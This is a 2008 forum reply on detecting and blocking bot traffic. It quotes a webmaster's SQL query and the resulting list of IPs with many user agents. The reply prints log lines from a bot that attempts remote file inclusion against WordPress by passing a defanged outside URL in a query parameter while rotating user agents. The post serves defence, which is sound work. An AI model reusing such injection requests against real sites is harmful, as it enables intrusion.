View Single Post
  #5 (permalink)  
Old 05-12-2008, 05:43 PM
Tech Manager Tech Manager is offline
WebProWorld Pro
 
Join Date: Jan 2008
Posts: 290
Tech Manager RepRank 1
Default Re: Deluge of the bots

Quote:
Originally Posted by wige View Post
Yeah, that is what I am looking to do, but I need to grab the most suspect IP addresses from the database, and I am unsure what tolerances I should use.

Right now, the query SELECT IP, COUNT(DISTINCT useragent) AS Agents, COUNT(DISTINCT productID) as Products FROM pageviews GROUP BY IP ORDER BY Agents DESC; gives me the following table:

117.102.128.221 9 1
77.127.155.176 9 1
125.204.58.200 8 1
190.50.125.136 8 1
216.198.139.38 8 1
220.95.108.239 8 1
66.63.219.212 8 1
87.205.215.237 8 1
89.3.18.208 8 1
79.177.161.75 7 1
85.180.253.111 7 1

The first number is the number of unique user agents, and the second is the number of products they viewed. Note: it is not unusual for legitimate users to view the same product several times due to users re-viewing the page with AJAX.

Obviously, I think using nine different user agents to view a single product is highly suspect, but I am not sure where I should draw the line, and if there are other aspects I should be considering before deciding which IPs to block.
Let me give you an example of malicious ativity from likely botnets (most likely infected systems). The following is an example of a single IP address, showing multiple platforms and user agents. This particular bot is attempting to inject a malicious script into a WordPress site (I've added spaces so the malicious url can't be clicked on):

80.230.118.211 - - [12/May/2008:06:39:29 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Googlebot/2.1 (h t t p:// googlebot.com/bot. html)"
80.230.118.211 - - [12/May/2008:06:48:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
80.230.118.211 - - [12/May/2008:06:53:47 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
80.230.118.211 - - [12/May/2008:06:58:42 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)"
80.230.118.211 - - [12/May/2008:07:03:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)"
80.230.118.211 - - [12/May/2008:07:10:53 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 9"
80.230.118.211 - - [12/May/2008:07:19:51 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5"

This "bot" initially pretends to be a Google bot but it quickly becomes apparent that such is not the case. It's obviously attempting to bypass traditional filters that rely on certain criteria. In this case it attempts to cloaks its identity by changing the platform and user agent. This in itself is the signature of undesirable traffic.

In the above case I am redirecting the traffic elsewhere based on several different pieces of information: IP, Platform, User Agent and of course the obvious attempt to remotely inject a PHP script into the WordPress variables.

In your case I think it is best to contain the IP address if it has more than two changes. This would include platform and user agent. You could also add a time element into the mix and use it as the deciding factor with the first two elements..
__________________
I use Country IP Blocks as added security for my networks and servers.

Last edited by Tech Manager; 05-12-2008 at 05:57 PM.
Reply With Quote